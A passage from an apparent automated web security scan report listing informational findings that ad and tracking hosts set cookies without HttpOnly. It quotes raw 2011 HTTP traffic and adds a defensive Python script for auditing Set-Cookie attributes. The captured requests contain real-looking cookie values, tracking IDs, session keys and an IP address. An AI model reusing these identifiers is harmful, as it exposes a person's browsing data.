GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...

14.112. http://as00.estara.com/fs/ruleaction.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/ruleaction.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fs/ruleaction.php?accountid=200106297609&urid=79044&cookieurid=&estara_fsguid=5860EEFA281121EC93852AEC182A3278&dnc=1317600784907704486 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsserver__SESSION__=t-501.estara.com; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:14 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__; expires=Sat, 01-Oct-2016 00:13:14 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}
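The check behind this finding, and every other finding in this section, can be reproduced offline. The script below is an added example written for this page, not code from the report or from Burp Suite: it parses each Set-Cookie header in a raw response, reports which of HttpOnly, Secure and SameSite are absent, and applies a simple "does this look like a session token" heuristic so a reviewer can triage which cookies deserve a closer look. The sample header block is constructed from responses in this section (values shortened); the SESSION_NAME_HINTS list and the 32-character opaque-value threshold are assumptions of this example, not the scanner's rules, and they deliberately err on the side of flagging a GUID-sized value for review.

```python
"""Audit Set-Cookie headers for missing security attributes.

Added example for this report; not part of the original scanner output.
The sample headers are constructed copies of the kind shown in the findings
(values shortened); the heuristics below are this example's assumptions.
"""
import re
from dataclasses import dataclass, field

# Substrings that commonly mark a session-carrying cookie name. Assumption of
# this example; the scanner's own list is not reproduced on the page.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class CookieCheck:
    name: str
    value: str
    attributes: dict = field(default_factory=dict)
    missing: list = field(default_factory=list)
    looks_like_session: bool = False


def parse_set_cookie(header: str) -> CookieCheck:
    """Split one Set-Cookie header value into name, value and attributes.

    Attribute names are lower-cased so HttpOnly / httponly compare equal;
    flag attributes without a value (HttpOnly, Secure) map to True.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    check = CookieCheck(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        if not attr:
            continue  # tolerates a trailing ';' such as the openx.net response sends
        key, has_eq, val = attr.partition("=")
        check.attributes[key.strip().lower()] = val.strip() if has_eq else True
    return check


def looks_like_session_token(name: str, value: str) -> bool:
    """Cheap triage heuristic: session-like name, or a long opaque value.

    A 32+ character run of token characters (hex, base64url) with no visible
    structure ('&', '|', '/') is flagged for review even if the name is bland.
    """
    lowered = name.lower()
    if any(hint in lowered for hint in SESSION_NAME_HINTS):
        return True
    return bool(re.fullmatch(r"[A-Za-z0-9_\-]{32,}", value))


def audit_set_cookie(header: str, served_over_https: bool = False) -> CookieCheck:
    """Record which protective attributes a cookie lacks.

    HttpOnly is always expected on anything script does not need to read.
    Secure is only meaningful when the response arrived over HTTPS, so it is
    only reported then (the captures in this report are plain HTTP).
    SameSite is reported when absent because browsers then fall back to
    their own default rather than the server's intent.
    """
    check = parse_set_cookie(header)
    check.looks_like_session = looks_like_session_token(check.name, check.value)
    if "httponly" not in check.attributes:
        check.missing.append("HttpOnly")
    if served_over_https and "secure" not in check.attributes:
        check.missing.append("Secure")
    if "samesite" not in check.attributes:
        check.missing.append("SameSite")
    return check


def audit_response_headers(raw_headers: str, served_over_https: bool = False) -> list:
    """Run audit_set_cookie over every Set-Cookie line in a raw header block."""
    results = []
    for line in raw_headers.splitlines():
        key, sep, val = line.partition(":")
        if sep and key.strip().lower() == "set-cookie":
            results.append(audit_set_cookie(val.strip(), served_over_https))
    return results


# Constructed sample: header lines modelled on responses in this section,
# plus one cookie that does carry HttpOnly for contrast.
SAMPLE_HEADERS = """\
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Set-Cookie: p=1317599506; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: JSESSIONID=8A4F2C1E9B7D; Path=/; HttpOnly
Content-Type: text/html
"""

if __name__ == "__main__":
    for c in audit_response_headers(SAMPLE_HEADERS):
        flag = "session-like" if c.looks_like_session else "not session-like"
        print(f"{c.name}: missing {c.missing or 'nothing'} ({flag})")
```

Run against a saved response (or paste the header block from a finding), the output tells you in one line whether the missing flag matters: a cookie reported as both missing HttpOnly and session-like is the one to chase; a short counter or timestamp without the flag is the low-risk case these findings describe.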

14.113. http://as00.estara.com/fs/rules.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: fs_nocache_guid and fscookies (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC20111003000909914181269334%26plf%3Dpcln%26INIT_SESSION%3Dtrue%26RefID%3DPLIGOUGO%26RefClickID%3DHOTELSEARCH&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=1317600769877566774 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XY5LDoMwDERvw67InzjEC85SQYtEF9CqpPevCIlJ69WM33hkAkDwpCokPTKKkIbgmmGM0xapotf3sN7Xz9J716KCei3DTc4FAcktDMh-LYlaS2iRxAnYdNwgk1zmR9z6rJ.vad21dGj7Xee9YEAu4DA-ZBnibZ4SDMpqyWRKMpkqCSxnMpmSBPY18UacR2d-HOa84fqG6zZXE2eEBQIVcpiTaE20kC8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Set-Cookie: fscookies=b64_XZNNUsMwDIVvkx0d-drWomdhCnSmLFoYCPfHcWxZaTbx8yc9R5JDAAiJzJT0jIyqZKXIcnlbr78rBfr6c3l8PP7u5yQnNLBk4.GlxxUF7S4MyE8ujbpLOSGpKPiTeUEmfbl9rr-nvv76vj62tWb0-W3d9xUL8gC7OJD7ZX2-XRssxuaRTYzIJkIksM7IJkYkcIokOZGE4t.xi5nDMYejm0QiTlih0CC7mMQiMSdjUDmBbQOobyhsT2PcqA9A5SSI5FO0jEvJSL0Q6qIdQEsmHIUMMYlEIpFoJBoJRUKTGKg4aWKQ2qKZ04ST2opJNtFJAUnutotB6pWelTYxCUaCTkiszIK6CgzmPaob9U8q6sG7GsFVJY3BNZsOzhSdc3l2zgfnfHDW6FxbKLGf4h1AxDRH2pXbpMMR6XBEOhSWYmGCGUIdTc08Bgl5m4pMD0zDjagfPSrCfw__; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:13:59 GMT
Content-Length: 26084
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...

14.114. http://asset.userfly.com/users/20826/userfly.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset.userfly.com
Path:   /users/20826/userfly.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: capture_guid (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/20826/userfly.js HTTP/1.1
Host: asset.userfly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 3
Cache-Control: max-age=3600, private, max-stale=3600
Set-Cookie: capture_guid=9c784e4c-ed53-11e0-ab0a-12313b03145d; domain=userfly.com; path=/
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8


14.115. http://ats.tumri.net/ats/ats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/ats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: t_opt (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Sat, 21-Oct-2079 03:23:16 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon Oct 03 00:09:09 UTC 2011
Content-Type: image/jpeg
Date: Mon, 03 Oct 2011 00:09:08 GMT
Content-Length: 807

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

14.116. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&c3=345&c4=59764&c5=7061&c15=1931%252C357%252C3196%252C996%252C2712%252C553%252C3115&c16=EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1&ns__t=1317599359145&ns_c=UTF-8&c8=Premier%20League%20football%20news%20from%20the%20Barclays%20Premier%20League%20%7C%20Manchester%20United%202-0%20Norwich%20City&c7=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2469333%2C00.html&c9=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:50:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


14.117. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:52:46 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:52:46 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

14.118. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035250&d.c=gif&d.o=guardiangu-network&d.x=43465411&d.t=page&d.u=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:51:22 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:51:22 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

14.119. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p119936314&c3=71054945&c4=43921374&c5=1&c6=1&c7=Sun%20Oct%20%202%2023%3A59%3A13%202011&c8=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome&c9=Official%20Site%20of%20the%20Premier%20League%20-%20Barclays%20Premier%20League%20News%2C%20Fixtures%20and%20Results%20%7C%20Home&c10=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2466648%2C00.html&c15=&1317599979190 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 03 Oct 2011 00:01:13 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Wed, 02-Oct-2013 00:01:13 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


14.120. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: V and pb_rtb_ev (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=531292&ev=OO-00000000000000000&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DOO-00000000000000000 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr

Response

HTTP/1.1 302 Moved Temporarily
Server: GlassFish v3
CW-Server: cw-app605
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr99f871d6edb7aea19dd0bf8; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:50:17 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|530739.99f871d6ab8391d98e386b3c.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|531292.OO-00000000000000000.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 01-Oct-2012 23:50:17 GMT; Path=/
Location: http://m.xp1.ru4.com/meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 239
Date: Sun, 02 Oct 2011 23:50:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=OO-000000000000
...[SNIP]...

14.121. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: V and cwbh1 (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://rs.gwallet.com/r1/pixel/x1743
Accept-Encoding: gzip,deflate,sdch
